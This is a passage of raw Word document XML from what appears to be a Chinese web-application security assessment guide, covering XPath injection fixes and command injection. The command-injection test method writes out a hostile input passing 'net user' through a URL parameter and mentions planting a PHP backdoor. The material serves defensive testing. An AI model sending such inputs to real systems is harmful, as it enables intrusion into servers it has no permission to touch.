      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：通过构造</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Xpath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询语句进行注入，操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidR="00D1626D" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E49C080" w14:textId="77777777" w:rsidR="001909FE" w:rsidRPr="00F43721" w:rsidRDefault="001A7A0B" w:rsidP="00F43721">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="001909FE" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前专门的</w:t>
      </w:r>
      <w:r w:rsidR="001909FE" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XPath </w:t>
      </w:r>
      <w:r w:rsidR="001909FE" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击防御技术还不是太多，但是</w:t>
      </w:r>
      <w:r w:rsidR="001909FE" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r w:rsidR="001909FE" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击防御技术</w:t>
      </w:r>
      <w:r w:rsidR="001909FE" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001909FE" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以加以改进，应用到</w:t>
      </w:r>
      <w:r w:rsidR="001909FE" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XPath </w:t>
      </w:r>
      <w:r w:rsidR="001909FE" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击防御。具体技术总结如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6AB289" w14:textId="54BD3707" w:rsidR="001909FE" w:rsidRPr="00F43721" w:rsidRDefault="001909FE" w:rsidP="00F43721">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据提交到服务器上端，在服务端正式处理这批数据之前，对提交数据的合法性进行验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5008E9" w14:textId="0F690AA6" w:rsidR="001909FE" w:rsidRPr="00F43721" w:rsidRDefault="001909FE" w:rsidP="00F43721">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查提交的数据是否包含特殊字符，对特殊字符进行编码转换或替换、删除敏感字</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>符或字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F72B5FF" w14:textId="23B8F9FC" w:rsidR="001909FE" w:rsidRPr="00F43721" w:rsidRDefault="001909FE" w:rsidP="00F43721">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于系统出现的错误信息，以</w:t>
      </w:r>
      <w:r w:rsidR="00E87B14" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误编码信息替换，屏蔽系统本身的出错信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBCF24C" w14:textId="5F4C4C23" w:rsidR="001909FE" w:rsidRPr="00F43721" w:rsidRDefault="001909FE" w:rsidP="00F43721">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数化</w:t>
      </w:r>
      <w:r w:rsidR="00E87B14" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询，将需要构建的</w:t>
      </w:r>
      <w:r w:rsidR="00E87B14" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询表达式，以变量的形式表示，变量不是可以执行的脚本。如下代码可以通过创建保存查询的外部文件使查询参数化：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>declare variable $loginID as xs</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>string external</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> declare variable $password as xs</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>string external</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //users/user[@loginID=$loginID and @password= $password]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EC781F" w14:textId="5B820A41" w:rsidR="001A7A0B" w:rsidRDefault="001909FE" w:rsidP="00950FBF">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00D17411" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等加密算法，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于数据敏感信息和在数据传输过程中加密，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即使某些非法用户通过非法手法获取数据包，看到的也是加密后的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB61C2E" w14:textId="6163E7A0" w:rsidR="00B44623" w:rsidRPr="00950FBF" w:rsidRDefault="00B44623" w:rsidP="00B44623">
      <w:pPr>
        <w:pStyle w:val="af1"/>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EAC313A" w14:textId="1E220783" w:rsidR="001A7A0B" w:rsidRPr="00F757E4" w:rsidRDefault="009C1845" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc498434563"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidR="001A7A0B" w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="64498C14" w14:textId="688B7D98" w:rsidR="001A7A0B" w:rsidRPr="00B9082D" w:rsidRDefault="001A7A0B" w:rsidP="00B9082D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Command Injection</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即命令注入攻击，是指由于</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序对用户提交的数据过滤不严格，导致黑客可以通过构造特殊命令字符串的方式，将数据提交至</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序中，并利用该方式执行外部程序或系统命令实施攻击，非法获取数据或者网络资源等。在命令注入的漏洞中，最为常见的是</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令注入。</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令注入攻击存在的主要原因是</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序员在应用</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言中一些具有命令执行功能的函数时，对用户提交的数据内容没有进行严格的过滤就带入函数中执行而造成的。例如，当黑客提交的数据内容为向网站目录写入</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件时，就可以通过该命令注入攻击漏洞写入一个</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidR="00D52AE0" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后门文件，进而实施下</w:t>
      </w:r>
      <w:r w:rsidR="00CD14C8" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一步</w:t>
      </w:r>
      <w:r w:rsidR="00295B1D" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E3064A" w14:textId="7CD1F266" w:rsidR="001F4EE7" w:rsidRPr="00B9082D" w:rsidRDefault="001A7A0B" w:rsidP="00B9082D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="001F4EE7" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="001F4EE7" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="001F4EE7" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描工具进行扫描，也可以通过手工进行验证：打开网站，</w:t>
      </w:r>
      <w:r w:rsidR="00A977C8" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00A977C8" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00A977C8" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中传入命令的参数</w:t>
      </w:r>
      <w:r w:rsidR="001F4EE7" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r w:rsidR="00A977C8" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所要执行的命令</w:t>
      </w:r>
      <w:r w:rsidR="001F4EE7" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如下图所示的</w:t>
      </w:r>
      <w:r w:rsidR="001F4EE7" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://192.168.1.3/?cmd=net user</w:t>
      </w:r>
      <w:r w:rsidR="001F4EE7" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以发现命令能够成功执行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A752B63" w14:textId="2D09326B" w:rsidR="001F4EE7" w:rsidRPr="00B9082D" w:rsidRDefault="001F4EE7" w:rsidP="00B9082D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DF67493" wp14:editId="24996D77">
            <wp:extent cx="4013200" cy="73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3200" cy="736600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E54D1E2" w14:textId="48D7C9BE" w:rsidR="001A7A0B" w:rsidRPr="00B9082D" w:rsidRDefault="00C24790" w:rsidP="00B9082D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="001A7A0B" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="009B5731" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="009B5731" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序没有过滤类似</w:t>
      </w:r>
      <w:r w:rsidR="009B5731" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>system()</w:t>
      </w:r>
      <w:r w:rsidR="009B5731" w:rsidRPr="00B9082D">
        <w:rPr>
